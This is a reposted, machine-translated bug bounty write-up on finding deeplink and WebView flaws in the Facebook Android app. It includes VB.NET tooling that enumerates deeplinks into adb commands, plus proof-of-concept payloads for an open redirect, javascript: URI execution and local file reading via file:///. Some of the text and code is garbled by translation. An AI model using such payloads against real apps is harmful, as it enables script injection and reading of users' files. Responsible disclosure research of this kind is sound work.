Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How to find Webview vulnerabilities in Facebook Android APP

2025-01-21 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

This article introduces how to find Webview loopholes in Facebook Android APP. The content is very detailed. Interested friends can use it for reference. I hope it will be helpful to you.

While working on the Facebook vulnerability testing project, I discovered two Webview component vulnerabilities in the Facebook Android APP app. Using these two vulnerabilities, an attacker can construct a malicious link and send it to the victim via Facebook Android APP, which the target victim clicks on, allowing the attacker to execute arbitrary Javascript code on the victim's phone.

Before the test results were accurate, I had tested these two vulnerabilities on three different mobile phone terminals, mainly in the Webview component.

Early discovery

The early steps in loophole testing are critical, which helps you understand the basics of your goals and help you focus on key points. In the early stampede of Facebook Android APP, I focused on one thing, which is deeplink in its APP, which can also be called mobile deep link or app jump.

Deeplink can be regarded as another type of hyperlink. In APP, it can associate you with a specific action. For example, fb://profile/1395634905, click this link in Android APP, and it will launch Facebook's APP app and jump to your profile page.

Therefore, I decided to look at some visible plain text files in the APK file first, so I used WinRAR to open the latest version of the Android app of Facebook, then looked for the string "fb://" in it, and after a while, it returned a result file. After assets/Bundle-fb4.js.hbc', inspection, it can be found that there are several deeplink in this file, including:

Fb://marketplace_product_details_from_for_sale_item_id

Fb://adsmanager

However, after some analysis, there is nothing useful in the end.

However, under a deeplink clue for fb://ama/, I found a file in the APK file opened by WinRAR-'react_native_routes.json', which can be regarded as a "gold mine", which contains multiple deeplink processed by the Facebook APP operation.

From the file diagram in the above figure, we can analyze and construct a valid Facebook deeplink as follows:

Fb://ama/?entryPoint= {STRING} & fb_hidesTabBar= {STRING} & presentationMethod= {STRING} & targetURI= {STRING}

The react_native_routes.json' file has more than 12000 lines of code, so I need some programming skills to extract valid deeplink links from it. After that, I developed two simple applications, one for converting the JSON format to a database structure, and the other for creating links from the database. In order to deal with the data later, I try my best to use the idea of database. The following is the program code to convert the JSON format to the database structure:

# Moving JSON into a database structureImports System.Data.SQLiteImports System.IOImports Newtonsoft.Json.LinqModule Module1 Sub Main (args () As String) ProcessFile ("react_native_routes.json") End Sub Public Sub ProcessFile (InputFile As String) Dim JSONText = File.ReadAllText (InputFile) If JSONText.StartsWith ("[") Then 'Make valid JSON JSONText = "{' results':" & JSONText & " } "End If Dim json As JObject = JObject.Parse (JSONText) Dim arr As JArray = json.SelectToken (" results ") For I = 0 To arr.Count-1 Try Dim RouteName As String = arr (I) .SelectToken (" name ") Dim RoutePath As String = arr (I) .SelectToken (" path ") Dim paramJSON As JObject = arr (I) .SelectToken ("paramDefinitions") Dim RouteParamateCount As Integer = arr (I) .SelectToken ("paramDefinitions"). Count If RouteParamateCount 0 Then Dim o As Integer = 0 Dim RouteID As Integer = insertRoute (RouteName) RoutePath, RouteParamateCount) For Each item As JProperty In arr (I) .SelectToken ("paramDefinitions") o + = 1 Dim ParamName = item.Name Dim ParamType = item.Value ("type"). ToString Dim ParamRequired = item.Value ("required"). ToString insertParamater (ParamName, ParamType, ParamRequired, o RouteID) Next End If Catch ex As Exception End Try Next End Sub Public Function insertRoute (RouteName As String, RoutePath As String RouteParamaterCount As Integer) As Integer Dim con As New SQLiteConnection ("Data Source=FBNativeRoutes.db") con.Open () Dim sql As String = "INSERT INTO RouteTable (RouteName, RoutePath, RouteParamaterCount, RouteAddedDateTime) VALUES (@ RN, @ RP, @ RPC) @ RAD) "Dim cmd As New SQLiteCommand (sql, con) cmd.Parameters.Add (" RN ", SqlDbType.VarChar). Value = RouteName cmd.Parameters.Add (" RP ", SqlDbType.VarChar). Value = RoutePath cmd.Parameters.Add (" RPC ", SqlDbType.Int). Value = RouteParamaterCount cmd.Parameters.Add (" RAD ") SqlDbType.Int). Value = Date.Now.Ticks cmd.ExecuteNonQuery () sql = "SELECT last_insert_rowid ()" cmd = New SQLiteCommand (sql, con) insertRoute = cmd.ExecuteScalar () con.Close () End Function Public Sub insertParamater (ParamaterName As String, ParamaterType As String, ParamaterRequired As Boolean, ParamaterOrderIndex As Integer RouteID As Integer) Dim PR As Integer = 0 If ParamaterRequired = True Then PR = 1 Else PR = 0 End If Dim con As New SQLiteConnection ("Data Source=FBNativeRoutes.db") con.Open () Dim sql As String = "INSERT INTO ParamaterTable (ParamaterName, ParamaterType, ParamaterRequired, ParamaterOrderIndex) RoutesID) VALUES (@ PN, @ PT, @ PR, @ POI, @ RID) "Dim cmd As New SQLiteCommand (sql, con) cmd.Parameters.Add (" PN ", SqlDbType.VarChar). Value = ParamaterName cmd.Parameters.Add (" PT ", SqlDbType.VarChar). Value = ParamaterType cmd.Parameters.Add (" PR ") SqlDbType.Int). Value = ParamaterRequired cmd.Parameters.Add ("POI", SqlDbType.Int). Value = PR cmd.Parameters.Add ("RID", SqlDbType.Int). Value = RouteID cmd.ExecuteNonQuery () con.Close () End SubEnd Module

With the above VB.NET code, each "path" in the JSON format file can be parsed into a corresponding entry in the path table RouteTable, which includes the name and the number of parameters. Similar to the actual parameters, the parameters may be stored in the parameter table ParamterTable, where the properties include the parameter type, name, index and required fields, as well as links in the return path (Route), and so on.

The following program code is used to process the contents of the SQLlite database, generate a command line list, and then execute deeplink in Android APP through the ADB tool.

# Building ADB commands ready for breakingImports System.Data.SQLiteImports System.IOModule Module1 Sub Main (args () As String) Dim FilePath As String = Date.Now.ToString ("ddMMyyHHmm") & ".txt" Dim FBLink As String = "Dim con As New SQLiteConnection (" Data Source=FBNativeRoutes.db ") con.Open () Dim sql As String =" SELECT RouteID, RouteName, RoutePath FROM RouteTable "Dim cmd As New SQLiteCommand (sql Con) Dim reader As SQLiteDataReader = cmd.ExecuteReader () If reader.HasRows Then Using sw As StreamWriter = New StreamWriter (FilePath) While reader.Read FBLink = BuildLink (reader ("RouteID"), reader ("RouteName") Reader ("RoutePath") FBLink = "adb shell am start-a"android.intent.action.VIEW"- d"& FBLink &" sw.WriteLine (FBLink) End While End Using End If reader.Close () con.Close () End Sub Public Function BuildLink (RouteID As Integer, RouteName As String RoutePath As String) As String BuildLink = $"fb:/ {RoutePath} /" Dim i As Integer = 0 Dim con As New SQLiteConnection ("Data Source=FBNativeRoutes.db") con.Open () Dim sql As String = "SELECT ParamaterName, ParamaterType, ParamaterRequired FROM ParamaterTable WHERE RoutesID = @ RID" Dim cmd As New SQLiteCommand (sql, con) cmd.Parameters.Add ("RID") SqlDbType.Int) .Value = RouteID Dim reader As SQLiteDataReader = cmd.ExecuteReader () If reader.HasRows Then While reader.Read () If I = 0 Then BuildLink & = "?" & reader ("ParamaterName") & "=" & getValidValue (reader ("ParamaterType")) Else BuildLink & = "\ &" & reader ("ParamaterName") & "=" & getValidValue (reader ("ParamaterType")) End If i + = 1 End While End If reader.Close () con.Close () End Function Public Function getValidValue (ParamaterType As String) As String Select Case ParamaterType Case "String" Return "{STRING}" Case "Int" Return "{INT} "Case" Boolean "Return" {BOOLEAN} "Case Else Return" {STRING} "End Select End FunctionEnd Module

Taking the ama deeplink discovered above as an example, the following is what the parsing looks like in the terminal application:

Adb shell am start-a "android.intent.action.VIEW"-d "fb://ama/?entryPoint= {STRING}\ & fb_hidesTabBar= {STRING}\ & presentationMethod= {STRING}\ & targetURI= {STRING}"

In this way, I can execute a deeplink like fb:// url from the command line, and the efficiency of checking deeplink is greatly improved!

Find a loophole

The first one-Open Redirection vulnerability

Now that we've pre-built a list of 364 command lines, let's get started and see what kind of response we can get from these command lines. A few deeplink were interesting throughout the process, but in the end I focused on the following three:

Adb shell am start-a "android.intent.action.VIEW"-d "fb://payments_add_paypal/?url= {STRING}"

Adb shell am start-a "android.intent.action.VIEW"-d "fb://ig_lwicreate_instagram_account_full_screen_ad_preview/?adPreviewUrl= {STRING}"

Adb shell am start-a "android.intent.action.VIEW"-d "fb://ads_payments_prepay_webview/?account= {STRING}\ & contextID= {STRING}\ & paymentID= {STRING}\ & url= {STRING}\ & originRootTag= {INTEGER}"

All three deeplink have one thing in common, that is, the url parameter, like url= {STRING} above. Well, since you need url, I'll give you one. Try it with https://google.com. The constructed Payload is as follows:

Adb shell am start-a "android.intent.action.VIEW"-d "fb://ig_lwicreate_instagram_account_full_screen_ad_preview/?adPreviewUrl= https://google.com"

The result is returned as follows:

Wow, it worked! This is an open redirection vulnerability! You know, Facebook has always attached great importance to vulnerabilities like SSRF and open redirection. Finally, after I reported it, I got a reward of no more, no less than $500 from Facebook.

Second-user terminal local file reading vulnerability

After laying the groundwork for the first loophole, I thought deeply and planned to exert a deeper impact on the loophole. Can I try it with javscript URI? Also, can you find a way to read local files? So, I constructed the following two Payload:

Adb shell am start-a "android.intent.action.VIEW"-d "fb://ig_lwicreate_instagram_account_full_screen_ad_preview/?adPreviewUrl=_javascript:confirm ('https://facebook.com/Ashley.King.UK')"

Adb shell am start-a "android.intent.action.VIEW"-d "fb://ig_lwicreate_instagram_account_full_screen_ad_preview/?adPreviewUrl= file:///sdcard/CDAInfo.txt"

Unexpectedly, both Payload were successfully implemented! One can call my own Facebook home page link, one can read the local file in the client phone!

In fact, after that, I also want to make comprehensive use of these loopholes and try to discover a deeper level of bug, but I can't find anything in the end. Without the source code, my black-box testing method can only stop here.

Response from the Facebook security team

We are dealing with your escalation vulnerability, which is that these servers can be called from any web page, but the impact is limited. The more serious impact is the local file reading vulnerability in the UI interface, but it also requires access to the user's terminal device in order to obtain the read data information.

However, we found some problems related to your reported vulnerabilities in WebView's code review, which occurred in the actual configuration and operation of WebView. Attackers can make comprehensive use of these problem bug to call some internal servers of Facebook applications and obtain some sensitive HTML5 API interface information.

On how to find Facebook Android APP Webview vulnerabilities to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 258

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report